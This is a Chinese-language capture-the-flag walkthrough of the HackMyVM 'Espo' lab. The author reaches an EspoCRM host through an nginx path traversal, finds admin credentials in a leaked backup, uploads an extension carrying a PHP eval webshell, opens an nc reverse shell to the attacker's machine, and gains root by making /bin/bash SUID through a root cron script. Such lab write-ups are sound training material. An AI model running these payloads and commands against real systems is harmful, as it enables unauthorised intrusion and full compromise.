hackmyvm-Espo

靶机地址

信息收集

主机发现

┌──(root㉿kali)-[/home/kali]
└─# arp-scan -I eth1 192.168.56.0/24                                                          
Interface: eth1, type: EN10MB, MAC: 00:0c:29:34:da:f5, IPv4: 192.168.56.103
WARNING: Cannot open MAC/Vendor file ieee-oui.txt: Permission denied
WARNING: Cannot open MAC/Vendor file mac-vendor.txt: Permission denied
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.56.1    0a:00:27:00:00:0e       (Unknown: locally administered)
192.168.56.100  08:00:27:3e:b3:0d       (Unknown)
192.168.56.117  08:00:27:38:1e:5d       (Unknown)

3 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 1.901 seconds (134.67 hosts/sec). 3 responded

192.168.56.117是我的靶机的地址

端口扫描

┌──(root㉿kali)-[/home/kali]
└─# nmap -sC -sV 192.168.56.117
Starting Nmap 7.95 ( https://nmap.org ) at 2025-03-17 12:22 EDT
Nmap scan report for 192.168.56.117
Host is up (0.0063s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 9.2p1 Debian 2+deb12u1 (protocol 2.0)
| ssh-hostkey: 
|   256 dd:83:da:cb:45:d3:a8:ea:c6:be:19:03:45:76:43:8c (ECDSA)
|_  256 e5:5f:7f:25:aa:c0:18:04:c4:46:98:b3:5d:a5:2b:48 (ED25519)
80/tcp open  http    nginx
| http-robots.txt: 1 disallowed entry 
|_/
|_http-title: EspoCRM
MAC Address: 08:00:27:38:1E:5D (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 18.20 seconds

一个ssh与web页面

80端口web页面

80端口就是一个登录框

对我来说这种用户登录数据包不太好爆破

页面指纹信息收集

┌──(root㉿kali)-[/home/kali]
└─# whatweb 192.168.56.117            
http://192.168.56.117 [200 OK] Country[RESERVED][ZZ], HTML5, HTTPServer[nginx], IP[192.168.56.117], PHP[8.2.7], PoweredBy[EspoCRM], Script[text/javascript], Title[EspoCRM], UncommonHeaders[x-content-type-options,content-security-policy], X-Frame-Options[SAMEORIGIN], X-Powered-By[PHP/8.2.7], nginx

nginx中间件。EspoCRM

经过查找EspoCRM 没有什么可以利用的漏洞。(但是有一个CVE是可以在插件安装页面上传php代码，我寻思这不是正常功能吗?……)

有一个admin路由(robots.txt里面没什么东西)

这个nginx中间件有一个目录穿越的漏洞

找出来一个_oldsite

又找出来一个info

┌──(root㉿kali)-[/home/kali/Desktop]
└─# curl 192.168.56.117/admin../_oldsite/info
# Backup Configuration Settings
# This configuration file dictates the backup protocols for critical data storage.

# Directory for storing backup files
# All backup files are stored in compressed ZIP format for efficient space usage and security.
# Ensure that backups are regularly updated and verified for data integrity.

backup_directory: /admin/_oldsite
backup_format: zip
# Note: The backup directory is designated for ZIP file backups only. 
# Regular maintenance and checks are required to ensure data consistency and reliability.

有zip网站备份

这个backup.zip下载下来就是网站源码了

在data/config.php中记录着管理员账号和密码

登录进去之后，来到管理员面板。配置扩展这块

我在官方网站上面找了一个免费的拓展将它下载了下来

你可能会遇到这个错误

这个时候你需要将manifest.json里面的acceptableVersions的值修改一下。修改成7.2.4以下的

然后在Extension的源码里面插入你的webshell之后,再次压缩成zip上传它

这个时候你也许会遇到一个新问题It's not an Installation package.

那是因为zip里面的目录结构必须要是左边的这样不能是右边的

上传成功之后安装它！

我插入的@eval($_REQUEST['a']); die(phpinfo());语句太多了自己给靶机的web环境干炸了

刚才测试上传zip的时候的那个数据包还在我的BurpSuite的Repeater的模块中

我尝试点一下Send页面返回了phpinfo()

成功命令执行

这里不知道为什么我的蚁剑连接不上去

还是反弹一个shell到我的kali上面去吧nc -e /bin/bash 192.168.56.103 7777

┌──(root㉿kali)-[/home/kali/Desktop]
└─# nc -lvkp 7777
listening on [any] 7777 ...
192.168.56.117: inverse host lookup failed: Unknown host
connect to [192.168.56.103] from (UNKNOWN) [192.168.56.117] 41572
whoami
www-data

拿上来一个pspy64看了看进程

root用户会定时执行cron.php

同时我们可以编辑cron.php 哎！我有一个想法🤓👆

我们给cron.php写入system("chmod +s /bin/bash");🤓👆

然后等一会bash就有了s权限

这个时候我们只需要bash -p